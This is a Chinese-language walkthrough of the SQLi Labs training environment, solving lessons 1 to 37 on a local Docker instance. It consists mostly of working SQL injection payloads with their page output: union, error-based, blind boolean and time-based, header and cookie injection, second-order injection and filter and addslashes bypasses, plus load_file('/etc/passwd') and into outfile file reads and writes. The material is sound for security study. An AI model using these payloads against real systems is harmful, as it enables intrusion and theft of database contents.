SQLi Labs

环境 #

使用Docker快速搭建SQLi Labs靶场环境,https://github.com/Audi-1/sqli-labs

docker run -dt --name sqli-lab -p 50080:80 acgpiano/sqli-labs:latest

部署完后访问http://localhost:50080/,数据库初始操作点击一下Setup/reset Database for labs

Tips #

information_schema #

information_schema是mysql自带的一个数据库,包含了各种原数据,可以获取以下信息

获取所有databases

select group_concat(schema_name) from information_schema.schemata

获取当前database

select database()

获取当前数据库的所有表tables

select group_concat(table_name) from information_schema.tables where 
table_schema = database()

获取某个表的所有columns

select group_concat(column_name) from information_schema.columns where 
table_schema = database() and table_name = 'users'

获取某个表中的数据

select group_concat(id,':',username,':',password) from users

注释 #

3种注释风格:

  • #: 后面直接加内容,如#this is a comment
  • --: 后面必须要加空格,如-- this is a comment,urlencode会将+替换为空格
  • /**/:  中间可以跨行,如/*this is a comment*/

注释的目的是:在输入数据改变了原有sql执行的情况下,能够正确闭合sql语句

文件操作 #

读文件

select load_file('/etc/passwd')

写文件

select * from user into outfile '/tmp/zqqtest'

DUAL为虚拟表,为了补齐语法结构

limit 0,1 或 limit 1 offset 0 取第一条

优先级 #

AND OR 优先级,And has precedence over Or

报错 #

extractvalue/updatexml这两个函数在执行时,如果出现xml文档路径错误就会产生报错

select 1 and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))));

select 1 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3));

以下Less的目的是获取当前数据库user表中的数据

Page-1 (Basic Challenges) #

Less-1 GET - Error based - Single quotes - String #

这里的Error based的含义是页面会有报错提示,让你知道是如何闭合的;搭配union select通过页面回显获取的数据

Less-1/?id=-1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'' LIMIT 0,1' at line 1

Less-1/?id=-1' order by 3 -- +
Less-1/?id=-1' order by 4 -- +
Unknown column '4' in 'order clause'

Less-1/?id=-1' union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() -- +
Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name = 'users' -- +
Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Less-1/?id=-1' union select 1,group_concat(id,':',username,':',password,'<br>'),3 from users -- +
Welcome    Dhakkan
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:admin
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:dumbo
,14:admin4:admin4

Your Password:3

Less-2 GET - Error based - Integer based #

Less-2/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

Less-2/?id=-1 order by 3 -- +
Less-2/?id=-1 order by 4 -- +
Unknown column '4' in 'order clause'

Less-2/?id=-1 union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

其余同上

Less-3 GET - Error based - Single quotes with twist - string #

Less-3/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

Less-3/?id=-1') union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

其余同上

Less-4 GET - Error based - Double quotes - String #

Less-4/?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

Less-4/?id=-1") union select 1,2,3 -- +
Welcome    Dhakkan
Your Login name:2
Your Password:3

Less-5 GET - Double injection - Single quotes - String #

这里的Double inject是指Double Query Injection,指的是类似下面的语句

select 
    count(*),
    concat((select database()), floor(rand() * 2)) as x        
from users 
group by x;

会触发Duplicate entry for key 'group_key'报错,并搭配报错信息带出额外数据

所以暂不考虑其他方法

Less-5/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Less-5/?id=-1' union select 1,2,3 -- +
Welcome    Dhakkan
You are in...........

# 数据库名
Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+

# 表名
Less-5/?id=1' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Subquery returns more than 1 row

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'emails1' for key 'group_key'

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'referers1' for key 'group_key'

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'uagents1' for key 'group_key'

Less-5/?id=0' union select count(*),2,(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Duplicate entry 'users1' for key 'group_key'

# 列名
?id=0' union select count(*),2,(concat((select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'id1' for key 'group_key'

?id=0' union select count(*),2,(concat((select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 1,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'username1' for key 'group_key'

?id=0' union select count(*),2,(concat((select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 2,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry 'password1' for key 'group_key'

# 数据
?id=0' union select count(*),2,(concat((select concat(id,':',username,':',password) from users limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +
Welcome    Dhakkan
Duplicate entry '1:Dumb:Dumb1' for key 'group_key'

# 其余数据略

Less-6 GET - Double injection - Double quotes - String #

Less-6/?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

# 数据库名
Less-6/?id=1" union select 1,count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+
Welcome    Dhakkan
Duplicate entry 'security1' for key 'group_key'

# 其余同上

Less-7 GET - Dump into file - String #

此题需要先进入容器chmod -R 777 /var/www/html,不然会报权限问题,secure_file_priv权限是没问题的

ERROR 1 (HY000): Can't create/write to file '/var/www/html/test.txt' (Errcode: 13)

Less-7/?id=1'
Welcome    Dhakkan
You have an error in your SQL syntax

Less-7/?id=1')) --+
Welcome    Dhakkan
You are in.... Use outfile......

Less-7/?id=1')) order by 4 --+
Welcome    Dhakkan
You have an error in your SQL syntax

Less-7/?id=-1')) union select 1,2,database() into outfile  '/var/www/html/test.txt' --+
Welcome    Dhakkan
You have an error in your SQL syntax

http://localhost:50080/test.txt
1	2	security

# 其他略

Less-8 GET - Blind - Boolean Based - Double Quotes #

Less-8/?id=1' --+
Welcome    Dhakkan
You are in...........

# 数据库名
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115 --+
Welcome    Dhakkan
You are in...........

Less-8/?id=1' AND ASCII(SUBSTRING((SELECT database()), 8, 1)) = 121 --+
Welcome    Dhakkan
You are in...........

# 表名
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT group_concat(table_name) from information_schema.tables where table_schema=database()), 1, 1)) = 101 --+
Welcome    Dhakkan
You are in...........

# 列名
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), 1 , 1)) = 105 --+
Welcome    Dhakkan
You are in...........

# 数据
Less-8/?id=1' AND ASCII(SUBSTRING((SELECT concat(id,':',username,':',password) from users limit 0,1), 1, 1)) = 49 --+
Welcome    Dhakkan
You are in...........

需要搭配Burp Suite使用

Less-9 GET - Blind - Time Based - Single Quotes #

Less-9/?id=1'
Welcome    Dhakkan
You are in...........

Less-9/?id=1 and SLEEP(2) --+
Welcome    Dhakkan
You are in...........

Less-9/?id=1' and SLEEP(2) --+

Less-9/?id=1' and IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 114, SLEEP(5), NULL) --+

Less-9/?id=1' and IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115, SLEEP(5), NULL) --+

其余同上

Less-10 GET - Blind - Time Based - Double Quotes #

Less-10/?id=1

Less-10/?id=1"

Less-10/?id=1" and SLEEP(5) --+

其余同上

Less-11 POST - Error Based - Single Quotes - String #

这里的Error based的含义是页面会有报错提示,让你知道是如何闭合的;搭配union select通过页面回显获取的数据

passwd=123'&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' LIMIT 0,1' at line 1

passwd=23' order by 2 --+&submit=Submit&uname=zqq

passwd=23' order by 3 --+&submit=Submit&uname=zqq
Unknown column '3' in 'order clause'

passwd=23' union select 1,2 --+&submit=Submit&uname=zqq
Your Login name:1
Your Password:2

passwd=23' union select database(),2 --+&submit=Submit&uname=zqq
Your Login name:security
Your Password:2

passwd=23' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() --+&submit=Submit&uname=zqq
Your Login name:emails,referers,uagents,users
Your Password:2

passwd=23' union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name = 'users' --+&submit=Submit&uname=zqq
Your Login name:id,username,password
Your Password:2

passwd=23' union select group_concat(id,':',username,':',password,'<br>'),2 from users --+&submit=Submit&uname=zqq
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:admin
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:dumbo
,14:admin4:admin4

Your Password:2

Less-12 POST - Error Based - Double Quotes - String - with twist #

passwd=1"&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

passwd=123") order by 3 --+&submit=Submit&uname=zqqq
Unknown column '3' in 'order clause'

passwd=123") union select 1,2 --+&submit=Submit&uname=zqq
Your Login name:1
Your Password:2

Less-13 POST - Double Injection - Single Quotes - String - with twist #

passwd=123'&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'') LIMIT 0,1' at line 1

passwd=123') union select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+&submit=Submit&uname=zqq
Duplicate entry 'security1' for key 'group_key'

passwd=123') union select count(*),(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +&submit=Submit&uname=zqq
Duplicate entry 'emails1' for key 'group_key'

Less-14 POST - Double Injection - Double Quotes - String #

passwd=123"&submit=Submit&uname=zqq
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"123"" LIMIT 0,1' at line 1

passwd=123" union select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+&submit=Submit&uname=zqq
Duplicate entry 'security1' for key 'group_key'

passwd=123" union select count(*),(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as x from information_schema.tables group by x -- +&submit=Submit&uname=zqq
Duplicate entry 'emails1' for key 'group_key'

Less-15 POST - Blind - Boolean Based - Single Quotes - String #

passwd=123' or sleep(2) --+&submit=Submit&uname=zqq

passwd=123' or IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115, SLEEP(5), NULL) --+&submit=Submit&uname=zqq

其余同上

Less-16 POST - Blind - Boolean Based - Double Quotes - String #

passwd=123") or sleep(2) --+&submit=Submit&uname=zqq

passwd=123") or IF(ASCII(SUBSTRING((SELECT database()), 1, 1)) = 115, SLEEP(5), NULL) --+&submit=Submit&uname=zqq

其余同上

Less-17 POST - Update Query - Error Based - String #

passwd=123'&submit=Submit&uname=Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'dhakkan'' at line 1

passwd=123';select 1--+&submit=Submit&uname=Dhakkan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 1-- ' WHERE username='dhakkan'' at line 1


passwd=123' and '1'='1&submit=Submit&uname=Dhakkan
passwd=123' and '1'='1'--+&submit=Submit&uname=Dhakkan

passwd=123' and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a)) --+&submit=Submit&uname=Dhakkan
Every derived table must have its own alias

passwd=123' and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a)b) --+&submit=Submit&uname=Dhakkan
Duplicate entry 'security1' for key 'group_key'

passwd=123' and (select 1 from (select count(*),(concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))as a from information_schema.tables group by a)b) --+&submit=Submit&uname=Dhakkan
Duplicate entry 'emails1' for key 'group_key'

其余同上

Less-18 POST - Header Injection - Uagent field - Error Based #

可以先利用Less-17重制密码先正常登陆

passwd=123&submit=Submit&uname=Dhakkan
Your User Agent is: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

User-Agent:
' + extractvalue(1,concat(0x7e,(select database()),0x7e)) +'
XPATH syntax error: '~security~'

' + extractvalue(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e)) +'
XPATH syntax error: '~emails~'

' + extractvalue(1,concat(0x7e,(select concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users' limit 1,1),0x7e)) +'
XPATH syntax error: '~username~'

' + extractvalue(1,concat(0x7e,(select concat(username,':',password) from users limit 4,1),0x7e)) +'
XPATH syntax error: '~stupid:1~'

Less-19 POST - Header Injection - Referer field - Error Based #

passwd=123&submit=Submit&uname=Dhakkan
Your Referer is: http://localhost:50080/Less-19/

Referer:
' + extractvalue(1,concat(0x7e,(select database()),0x7e)) +'
XPATH syntax error: '~security~'

其余同上

Less-20 POST - Cookie Injection - Error Based - string #

Cookie:
uname=dhakkan'
Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dhakkan'' LIMIT 0,1' at line 1

uname=' union select 1,2,3 --+
Your Login name:2
Your Password:3
Your ID:1

# 这里有回显,其余同上

Page-2 (Advanced Injections) #

Less-21 Cookie Injection - base64 encoded - Single quotes #

Cookie:
1234') union select 1,2,3 limit 0,1 -- +  # 需要base64 encode一下

# 其余同上

Less-22 Cookie Injection - base64 encoded - Double quotes #

Cookie:
1234" union select 1,2,3 limit 0,1 -- +  # 需要base64 encode一下

# 其余同上

Less-23 Get - Error based - strip comments #

?id=-1' union select 1,2,3 '
Your Login name:2
Your Password:3

# 其余同上,利用剩余语句闭合

Less-24 Second Degree Injection #

阅读源码发现共以下地方涉及sql语句 login.php:

function sqllogin(){

   $username = mysql_real_escape_string($_POST["login_user"]);
   $password = mysql_real_escape_string($_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
   $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysql_fetch_row($res);
	//print_r($row) ;
   if ($row[1]) {
			return $row[1];
   } else {
      		return 0;
   }
}

login-create.php:

$sql = "select count(*) from users where username='$username'";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

pass-change.php:

$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');

本题的目的是,先注册特殊用户,通过重置已经注册用户的密码,达到二次注入修改其他用户如admin的密码;利用的语句是

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

注册的用户名是admin'# 即可

Less-25 Error based - Trick with OR & AND #

preg_replace('/or/i',"",$id);
preg_replace('/AND/i',"",$id);

可以采用oorr anandd 这样绕过

Less-25/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Less-25/?id=-1' or '1'='1' --+
Hint: Your Input is Filtered with following result: -1' '1'='1' --

Less-25/?id=-1' oror '1'='1' --+
Hint: Your Input is Filtered with following result: -1' '1'='1' --

Less-25/?id=-1' oorr '1'='1' --+
Your Login name:Dumb
Your Password:Dumb
Hint: Your Input is Filtered with following result: -1' or '1'='1' -- # 可以看出来是不具备回溯的替换

Less-25/?id=-1' union select 1,group_concat(id,':',username,':',passwoorrd, '<br>'),3 from users limit 0,1 --+ 
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:123
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:123
,14:admin4:admin4
,15:zqq:123
,16:zqq':123
,17:zqq":123
,18:admin'#:123

Your Password:3

Less-25a Blind based - Trick with OR & AND #

这里的Blind的意思是,没有error提示你闭合信息

Less-25a/?id=-1 oorr '1'='1' --+
Your Login name:Dumb
Your Password:Dumb

Less-25a/?id=-1 union select 1,group_concat(id,':',username,':',passwoorrd, '<br>'),3 from users limit 0,1 --+ 
Your Login name:1:Dumb:Dumb
,2:Angelina:I-kill-you
,3:Dummy:p@ssword
,4:secure:crappy
,5:stupid:stupidity
,6:superman:genious
,7:batman:mob!le
,8:admin:123
,9:admin1:admin1
,10:admin2:admin2
,11:admin3:admin3
,12:dhakkan:123
,14:admin4:admin4
,15:zqq:123
,16:zqq':123
,17:zqq":123
,18:admin'#:123

Your Password:3

Less-26 Error based - Trick with comments and space #

Less-26/?id=0'%a0oorr%a0'1'='1 # 空格绕过,不用注释语句闭合
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''0'' LIMIT 0,1' at line 1

Less-26/?id=0'%a0union%a0select%a01,database(),'3

# 其余同上

Less-26a Blind based - Trick with comments and space - Blind #

Less-26a/?id=0'%a0oorr%a0'1'='1

Less-26a/?id=0')%a0union%a0select%a01,database(),('3
Your Login name:security
Your Password:3

# 其余同上

Less-27 Error based - Trick with SELECT & UNION - Single quotes #

Less-27/?id=0'%a0or%a0'1'='1
Your Login name:Dumb
Your Password:Dumb

# union是可以双写注入的,可是select就不行,不知为啥;可以使用随机大小写绕过
Less-27/?id=0'%a0uunionnion%a0SeLect%a01,2,'3
Your Login name:2
Your Password:3

# 其余同上

Less-27a Blind based - Trick with SELECT & UNION - Dobule quotes #

Less-27a/?id=0"%a0or%a0"1"="1
Your Login name:Dumb
Your Password:Dumb

Less-27a/?id=0"%a0uunionnion%a0SeLect%a01,2,"3
Your Login name:2
Your Password:3

# 其余同上

Less-28 Error based - Trick with SELECT & UNION - Single quotes with parenthesis #

Less-28/?id=0')%a0or%a0('1'='1
Your Login name:Dumb
Your Password:Dumb

Less-28/?id=0')%a0union%a0SeLect%a01,2,('3
Your Login name:2
Your Password:3

Less-28a Blind based - Trick with SELECT & UNION - Single quotes with parenthesis #

# 同上,只是没有报错回显

Less-29 Error based - Protection with WAF #

Less-29/?id=0'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''0'' LIMIT 0,1' at line 1

Less-29/?id=0' union select 1,2,'3
Your Login name:2
Your Password:3

Less-29/?id=0' union select 1,database(),'3
Your Login name:security
Your Password:3

Less-29 Error based - Protection with WAF - Single quotes #

看起来没有WAF,只是hint urlencode了

Less-29/?id=0'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''0'' LIMIT 0,1' at line 1

Less-29/?id=0' union select 1,2,'3
Your Login name:2
Your Password:3

Less-29/?id=0' union select 1,database(),'3
Your Login name:security
Your Password:3

Less-29/?id=0' union select 1,group_concat(username,':',password,'<br>'),3 from users where '1'='1
Your Login name:Dumb:Dumb
,Angelina:I-kill-you
,Dummy:p@ssword
,secure:crappy
,stupid:stupidity
,superman:genious
,batman:mob!le
,admin:123
,admin1:admin1
,admin2:admin2
,admin3:admin3
,dhakkan:123
,admin4:admin4
,zqq:123
,zqq':123
,zqq":123
,admin'#:123

Your Password:3

Less-30 Blind based - Protection with WAF - Double quotes #

Less-30/?id=0" union select 1,database(),"3
Your Login name:security
Your Password:3

# 其余同上

Less-31 Blind based - Protection with WAF - Double quotes with parenthesis #

Less-31/?id=0") union select 1,database(),("3
Your Login name:security
Your Password:3

# 其余同上

Less-32 Bypass addslashes() #

宽字节注入

Less-32/?id=-1%df' union select 1,2,3 --+

Less-33 Bypass addslashes() #

和上题一样

Less-34 POST - Bypass addslashes() #

POST 方式,注意%dfurlencode会变成%25df,即%也会被urlencode,稍微注意下即可,可以使用hackbar的raw或者burp suite转包改

uname=zqq%df' union select 1,2 --+&passwd=123&submit=Submit

Less-35 why care for addslashes() - Integer based #

整数型,不需要传单引号闭合,此时addslashes()是没有作用的

Less-35/?id=-1 union select 1,2,3 
Your Login name:2
Your Password:3

Less-36 Bypass mysql_real_escape_string #

This function escapes the same characters as addslashes() but also considers MySQL-specific issues, like certain multibyte character exploits. mysql_real_escape_string() requires an active database connection to MySQL to work correctly, as it uses the current character set to properly escape characters. mysql_real_escape_string() is part of the deprecated mysql extension and should no longer be used in new PHP code. addslashes() is still valid for general PHP use but is not recommended for escaping data to be used in SQL queries.

Less-36/?id=-1%df' union select 1,2,3 --+
Your Login name:2
Your Password:3

# 其余同上

Less-37 POST - Bypass mysql_real_escape_string #

POST 传输

uname=zqq%df' union select 1,2 --+&passwd=123&submit=Submit
Your Login name:1
Your Password:2

# 其余同上

Page-3 (Stacked Injections) #

TODO

Page-4 (Challenges) #

TODO